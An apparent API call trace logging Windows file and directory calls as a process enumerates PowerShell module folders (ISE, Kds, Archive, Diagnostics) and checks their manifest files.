	[0046.839] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37
	[0046.839] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7920
	[0046.839] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.840] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.840] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.840] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.840] FindClose (in: hFindFile=0x1505fab7920 | out: hFindFile=0x1505fab7920) returned 1
	[0046.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.840] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20
	[0046.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.841] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8340
	[0046.842] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.842] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.842] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.842] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.842] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0046.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.843] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab86a0
	[0046.843] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.843] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.843] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.844] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.844] FindClose (in: hFindFile=0x1505fab86a0 | out: hFindFile=0x1505fab86a0) returned 1
	[0046.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.844] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36
	[0046.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.844] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.844] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36
	[0046.844] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37
	[0046.844] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7860
	[0046.845] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.845] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.845] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.845] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.845] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.845] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20
	[0046.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.849] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f
	[0046.849] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50
	[0046.849] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab87c0
	[0046.850] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.850] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.850] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.850] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.850] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.850] FindClose (in: hFindFile=0x1505fab87c0 | out: hFindFile=0x1505fab87c0) returned 1
	[0046.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.858] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f
	[0046.858] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50
	[0046.858] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab73e0
	[0046.858] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.858] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.859] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.859] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.859] FindNextFileW (in: hFindFile=0x1505fab73e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.859] FindClose (in: hFindFile=0x1505fab73e0 | out: hFindFile=0x1505fab73e0) returned 1
	[0046.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0046.859] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55
	[0046.859] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56
	[0046.859] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab7ce0
	[0046.859] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.859] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.860] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0046.860] FindClose (in: hFindFile=0x1505fab7ce0 | out: hFindFile=0x1505fab7ce0) returned 1
	[0046.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0046.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0046.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0046.860] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55
	[0046.860] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56
	[0046.860] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab8400
	[0046.860] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.860] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.860] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0046.860] FindClose (in: hFindFile=0x1505fab8400 | out: hFindFile=0x1505fab8400) returned 1
	[0046.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0046.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0046.861] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d710, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55
	[0046.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0046.861] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x184c18dc30 | out: lpFileInformation=0x184c18dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db10) returned 1
	[0046.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db80) returned 1
	[0046.861] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d670, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55
	[0046.861] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56
	[0046.861] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x184c18d820 | out: lpFindFileData=0x184c18d820) returned 0x1505fab84c0
	[0046.861] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0046.861] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0046.861] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 0
	[0046.862] FindClose (in: hFindFile=0x1505fab84c0 | out: hFindFile=0x1505fab84c0) returned 1
	[0046.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dad0) returned 1
	[0046.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da90) returned 1
	[0046.862] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psd1")) returned 0xffffffff
	[0046.862] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psm1")) returned 0xffffffff
	[0046.862] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.cdxml")) returned 0xffffffff
	[0046.862] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.xaml")) returned 0xffffffff
	[0046.862] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.dll")) returned 0xffffffff
	[0046.862] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f
	[0046.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.862] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.862] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f
	[0046.862] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50
	[0046.863] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7e00
	[0046.863] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.863] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.863] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.863] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.863] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.863] FindClose (in: hFindFile=0x1505fab7e00 | out: hFindFile=0x1505fab7e00) returned 1
	[0046.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.863] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20
	[0046.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.864] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53
	[0046.864] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54
	[0046.864] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8640
	[0046.865] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.865] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.865] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.865] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0046.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.865] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53
	[0046.865] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54
	[0046.865] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8340
	[0046.866] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.866] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.866] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.866] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0046.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.866] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53
	[0046.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.866] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.866] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53
